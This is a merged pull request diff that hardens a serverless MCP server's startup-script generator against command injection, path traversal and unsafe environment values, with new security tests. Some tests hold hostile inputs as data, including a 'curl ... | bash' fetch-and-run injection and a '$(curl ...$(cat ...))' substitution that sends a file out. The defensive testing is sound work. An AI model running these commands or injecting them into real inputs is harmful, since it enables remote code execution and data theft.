Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,8 @@
"""

import os
import re
import shlex
import stat
from loguru import logger
from typing import Dict, Optional
Expand Down Expand Up @@ -68,10 +70,26 @@ async def generate_startup_script(
"""
startup_script_name = startup_script_name or get_default_startup_script_name(runtime)
script_path = os.path.join(built_artifacts_path, startup_script_name)
entry_point_path = os.path.join(built_artifacts_path, entry_point)

logger.info(f'Generating startup script for runtime: {runtime}, entry point: {entry_point}')

# Validate entry_point BEFORE checking file existence
validate_entry_point(entry_point)

# Validate environment variables if provided
if additional_env:
validate_environment_variables(additional_env)

# Check for path traversal attacks
entry_point_path = os.path.join(built_artifacts_path, entry_point)
resolved_entry_point = os.path.realpath(entry_point_path)
resolved_artifacts_path = os.path.realpath(built_artifacts_path)

if not resolved_entry_point.startswith(resolved_artifacts_path + os.sep):
raise ValueError(
'Path traversal detected: entry_point resolves outside built_artifacts_path'
)

# Check if entry point exists
if not os.path.exists(entry_point_path):
error = EntryPointNotFoundError(entry_point, built_artifacts_path)
Expand Down Expand Up @@ -121,6 +139,43 @@ def get_default_startup_script_name(runtime: str) -> str:
return 'bootstrap'


def validate_entry_point(entry_point: str) -> None:
"""Validate entry point against allowlist regex to prevent command injection.

Args:
entry_point: Application entry point to validate

Raises:
InvalidEntryPointError: If entry point contains invalid characters
"""
# Allowlist: only alphanumeric, dots, underscores, hyphens, and forward slashes
if not re.match(r'^[a-zA-Z0-9._/-]+$', entry_point):
raise ValueError(
'Entry point contains invalid characters. Only alphanumeric characters, dots, underscores, hyphens, and forward slashes are allowed.'
)


def validate_environment_variables(additional_env: Dict[str, str]) -> None:
"""Validate environment variable keys and values.

Args:
additional_env: Dictionary of environment variables to validate

Raises:
InvalidEnvironmentVariableError: If any key or value is invalid
"""
for key, value in additional_env.items():
# Environment variable keys should follow POSIX naming conventions
if not re.match(r'^[a-zA-Z_][a-zA-Z0-9_]*$', key):
raise ValueError(
'Environment variable key must start with a letter or underscore and contain only alphanumeric characters and underscores'
)

# Check for null bytes in values which can cause issues
if '\0' in value:
raise ValueError('Environment variable value contains null bytes')


def generate_script_content(
runtime: str, entry_point: str, additional_env: Optional[Dict[str, str]] = None
) -> str:
Expand All @@ -132,25 +187,30 @@ def generate_script_content(
additional_env: Additional environment variables

Returns:
str: Script content
str: Script content with properly escaped values
"""
# Generate environment variables setup
# Sanitize entry_point to prevent command injection
safe_entry_point = shlex.quote(entry_point)

# Generate environment variables setup with proper escaping
env_setup = ''
if additional_env:
env_vars = []
for key, value in additional_env.items():
env_vars.append(f'export {key}="{value}"')
# Key is already validated, but value needs escaping
safe_value = shlex.quote(value)
env_vars.append(f'export {key}={safe_value}')
env_setup = '\n'.join(env_vars) + '\n\n'

if runtime.startswith('nodejs'):
return f"""#!/bin/bash
{env_setup}# Start the application
exec node {entry_point}
exec node {safe_entry_point}
"""
elif runtime.startswith('python'):
return f"""#!/bin/bash
{env_setup}# Start the application
exec python {entry_point}
exec python {safe_entry_point}
"""
elif runtime.startswith('java'):
# Determine if it's a JAR file or a class
Expand All @@ -159,31 +219,31 @@ def generate_script_content(
if is_jar:
return f"""#!/bin/bash
{env_setup}# Start the application
exec java -jar {entry_point}
exec java -jar {safe_entry_point}
"""
else:
return f"""#!/bin/bash
{env_setup}# Start the application
exec java {entry_point}
exec java {safe_entry_point}
"""
elif runtime.startswith('dotnet'):
return f"""#!/bin/bash
{env_setup}# Start the application
exec dotnet {entry_point}
exec dotnet {safe_entry_point}
"""
elif runtime.startswith('go'):
return f"""#!/bin/bash
{env_setup}# Start the application
exec ./{entry_point}
exec ./{safe_entry_point}
"""
elif runtime.startswith('ruby'):
return f"""#!/bin/bash
{env_setup}# Start the application
exec ruby {entry_point}
exec ruby {safe_entry_point}
"""
else:
# Generic script for unknown runtimes
return f"""#!/bin/bash
{env_setup}# Start the application
exec {entry_point}
exec {safe_entry_point}
"""
177 changes: 165 additions & 12 deletions src/aws-serverless-mcp-server/tests/test_startup_script_generator.py
Original file line number Diff line number Diff line change
Expand Up @@ -74,8 +74,8 @@ def test_generate_script_content_nodejs_with_env(self):
result = generate_script_content(runtime, entry_point, additional_env)

expected = """#!/bin/bash
export NODE_ENV="production"
export PORT="3000"
export NODE_ENV=production
export PORT=3000

# Start the application
exec node server.js
Expand Down Expand Up @@ -104,8 +104,8 @@ def test_generate_script_content_python_with_env(self):
result = generate_script_content(runtime, entry_point, additional_env)

expected = """#!/bin/bash
export PYTHONPATH="/app"
export DEBUG="true"
export PYTHONPATH=/app
export DEBUG=true

# Start the application
exec python main.py
Expand Down Expand Up @@ -274,10 +274,10 @@ async def test_generate_startup_script_with_env_vars(self):

assert result == 'bootstrap'

# Verify script content includes environment variables
# Verify script content includes environment variables (shlex.quote format)
written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list)
assert 'export NODE_ENV="production"' in written_content
assert 'export PORT="8080"' in written_content
assert 'export NODE_ENV=production' in written_content
assert 'export PORT=8080' in written_content

@pytest.mark.asyncio
async def test_generate_startup_script_entry_point_not_found(self):
Expand Down Expand Up @@ -369,11 +369,11 @@ def test_generate_script_content_environment_variable_escaping(self):

result = generate_script_content(runtime, entry_point, additional_env)

# All values should be wrapped in double quotes
assert 'export SIMPLE_VAR="value"' in result
assert 'export VAR_WITH_QUOTES="value with "quotes""' in result
assert 'export VAR_WITH_SPACES="value with spaces"' in result
assert 'export VAR_WITH_SPECIAL="value$with&special*chars"' in result
# shlex.quote() wraps simple values without quotes, and complex values in single quotes
assert 'export SIMPLE_VAR=value' in result
assert 'export VAR_WITH_QUOTES=\'value with "quotes"\'' in result
assert "export VAR_WITH_SPACES='value with spaces'" in result
assert "export VAR_WITH_SPECIAL='value$with&special*chars'" in result

@pytest.mark.asyncio
async def test_generate_startup_script_file_write_error(self):
Expand Down Expand Up @@ -408,3 +408,156 @@ async def test_generate_startup_script_chmod_error(self):
):
with pytest.raises(OSError, match='Permission denied'):
await generate_startup_script(runtime, entry_point, built_artifacts_path)

"""Security tests for command injection vulnerabilities."""

@pytest.mark.asyncio
async def test_entry_point_command_injection_blocked(self):
"""Test that entry_point with command injection attempts is rejected."""
runtime = 'nodejs18.x'
entry_point = 'app.js; curl http://example.com/script.sh | bash'
built_artifacts_path = '/dir/artifacts'

with patch('os.path.exists', return_value=True):
with pytest.raises(ValueError, match='Entry point contains invalid characters'):
await generate_startup_script(runtime, entry_point, built_artifacts_path)

@pytest.mark.asyncio
async def test_entry_point_path_traversal_blocked(self):
"""Test that path traversal in entry_point is rejected."""
runtime = 'nodejs18.x'
entry_point = '../../../system/config'
built_artifacts_path = '/dir/artifacts'

with patch('os.path.exists', return_value=True):
with pytest.raises(
ValueError,
match='(Entry point contains invalid characters|Path traversal detected)',
):
await generate_startup_script(runtime, entry_point, built_artifacts_path)

@pytest.mark.asyncio
async def test_env_variable_command_substitution_escaped(self):
"""Test that command substitution in environment variables is properly escaped."""
runtime = 'nodejs18.x'
entry_point = 'app.js'
built_artifacts_path = '/dir/artifacts'
additional_env = {'DB_URL': '$(curl example.com/data?query=$(cat /path/to/config))'}

mock_file = mock_open()
mock_stat_result = MagicMock()
mock_stat_result.st_mode = 0o644

with (
patch('os.path.exists', return_value=True),
patch('os.path.realpath', side_effect=lambda x: x),
patch('builtins.open', mock_file),
patch('os.stat', return_value=mock_stat_result),
patch('os.chmod'),
):
await generate_startup_script(
runtime, entry_point, built_artifacts_path, additional_env=additional_env
)

written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list)
# Single quotes prevent command substitution in bash
assert "'$(curl example.com/data?query=$(cat /path/to/config))'" in written_content
# Ensure it's not in double quotes (which would allow execution)
assert '"$(curl example.com/data?query=$(cat /path/to/config))"' not in written_content

@pytest.mark.asyncio
async def test_env_variable_invalid_key_rejected(self):
"""Test that environment variable keys with invalid characters are rejected."""
runtime = 'nodejs18.x'
entry_point = 'app.js'
built_artifacts_path = '/dir/artifacts'
additional_env = {
'INVALID-KEY': 'value' # Hyphens not allowed in POSIX env var names
}

with (
patch('os.path.exists', return_value=True),
patch('os.path.realpath', side_effect=lambda x: x),
):
with pytest.raises(
ValueError, match='Environment variable key must start with a letter'
):
await generate_startup_script(
runtime, entry_point, built_artifacts_path, additional_env=additional_env
)

@pytest.mark.asyncio
async def test_env_variable_null_byte_rejected(self):
"""Test that environment variable values with null bytes are rejected."""
runtime = 'nodejs18.x'
entry_point = 'app.js'
built_artifacts_path = '/dir/artifacts'
additional_env = {'DB_URL': 'value\x00malicious'}

with (
patch('os.path.exists', return_value=True),
patch('os.path.realpath', side_effect=lambda x: x),
):
with pytest.raises(ValueError, match='Environment variable value contains null bytes'):
await generate_startup_script(
runtime, entry_point, built_artifacts_path, additional_env=additional_env
)

@pytest.mark.asyncio
async def test_valid_entry_point_accepted(self):
"""Test that valid entry_point values are accepted."""
runtime = 'nodejs18.x'
entry_points = [
'app.js',
'src/app.js',
'dist/server.js',
'app-server.js',
'app_server.js',
'./app.js',
]
built_artifacts_path = '/dir/artifacts'

mock_file = mock_open()
mock_stat_result = MagicMock()
mock_stat_result.st_mode = 0o644

for entry_point in entry_points:
with (
patch('os.path.exists', return_value=True),
patch('builtins.open', mock_file),
patch('os.stat', return_value=mock_stat_result),
patch('os.chmod'),
patch('os.path.realpath', side_effect=lambda x: x),
):
result = await generate_startup_script(runtime, entry_point, built_artifacts_path)
assert result == 'bootstrap'

@pytest.mark.asyncio
async def test_valid_env_variables_accepted(self):
"""Test that valid environment variables are accepted."""
runtime = 'nodejs18.x'
entry_point = 'app.js'
built_artifacts_path = '/dir/artifacts'
additional_env = {
'NODE_ENV': 'production',
'PORT': '3000',
'DB_HOST': 'localhost',
'_PRIVATE_VAR': 'value',
'VAR123': 'value',
}

mock_file = mock_open()
mock_stat_result = MagicMock()
mock_stat_result.st_mode = 0o644

with (
patch('os.path.exists', return_value=True),
patch('os.path.realpath', side_effect=lambda x: x),
patch('builtins.open', mock_file),
patch('os.stat', return_value=mock_stat_result),
patch('os.chmod'),
):
result = await generate_startup_script(
runtime, entry_point, built_artifacts_path, additional_env=additional_env
)
assert result == 'bootstrap'
Loading